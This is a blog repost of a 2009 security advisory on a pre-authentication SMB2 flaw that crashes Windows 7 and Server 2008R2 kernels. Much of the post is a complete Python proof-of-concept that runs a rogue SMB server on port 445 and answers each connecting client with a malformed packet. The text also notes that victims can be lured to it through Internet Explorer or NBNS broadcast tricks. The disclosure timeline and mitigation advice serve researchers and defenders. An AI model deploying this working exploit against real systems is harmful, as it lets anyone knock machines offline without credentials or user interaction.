Windows 7 / Server 2008R2 Remote Kernel Crash
2009年11月12日 |
This bug is a real proof that SDL #FAIL
The bug trigger an infinite loop on smb{1,2}, pre-auth, no credential needed…
Can be trigered outside the lan via (IE*, over layer 5..)
The bug is so noob, it should have been spotted 2 years ago by the SDL if the SDL would have ever existed:
netbios_header = struct.pack(“>i”, len(”.join(SMB_packet))+SMB_packet
(The netbios header provide the length of the incoming smb{1,2} packet)
If netbios_header is 4 bytes smaller or more than SMB_packet, it just blow !
WHAT ?? you gotta be kidding me where’s my SDL ?!?
“Most secure Os ever”;
What ever your firewall is set to, you can get remotly smashed via IE or even via some broadcasting nbns tricks (no user interaction)
How funny.
Advisory:
=============================================
– Release date: November 11th, 2009
– Discovered by: Laurent Gaffié
– Severity: Medium/High
=============================================
I. VULNERABILITY
————————-
Windows 7 * , Server 2008R2 Remote Kernel Crash
II. BACKGROUND
————————-
#FAIL,#FAIL,#FAIL
SDL FAIL, ‘Most Secure Os Ever’ –> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL
III. DESCRIPTION
————————-
See : http://g-laurent.blogspot.com/ for much more details
#Comment: This bug is specific Windows 7/2008R2.
IV. PROOF OF CONCEPT
————————-
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
#win7-crash.py: #Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop) #Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop. #NO BSOD, YOU GOTTA PULL THE PLUG. #To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash #Author: Laurent Gaffié # import SocketServer packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a.. "\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41" "\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00" "\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01" "\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20" "\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e" "\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a" class SMB2(SocketServer.BaseRequestHandler): def handle(self): print "Who:", self.client_address print "THANKS SDL" input = self.request.recv(1024) self.request.send(packet) self.request.close() launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445 launch.serve_forever() |
V. BUSINESS IMPACT
————————-
An attacker can remotly crash any Windows 7/Server 2008R2
on a LAN or via IE
VI. SYSTEMS AFFECTED
————————-
Windows 7, Windowns Server 2008R2
VII. SOLUTION
————————-
No patch available for the moment, your vendor do not care.
Close SMB feature and ports, until a real audit is provided.
VIII. REFERENCES
————————-
http://blogs.msdn.com/sdl/
IX. CREDITS
————————-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
X. REVISION HISTORY
————————-
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknoledge the vuln
November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug shouldn’t appears on a security bulletin.
November 11th, 2009: Win 7 remote kernel smash released
XI. LEGAL NOTICES
————————-
The information contained within this advisory is supplied “as-is”
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
XII.Personal Notes
————————-
More Remote Kernel FD @MS to come.
没有评论
暂无评论
RSS feed for comments on this post.
对不起,该文章的评论被关闭了!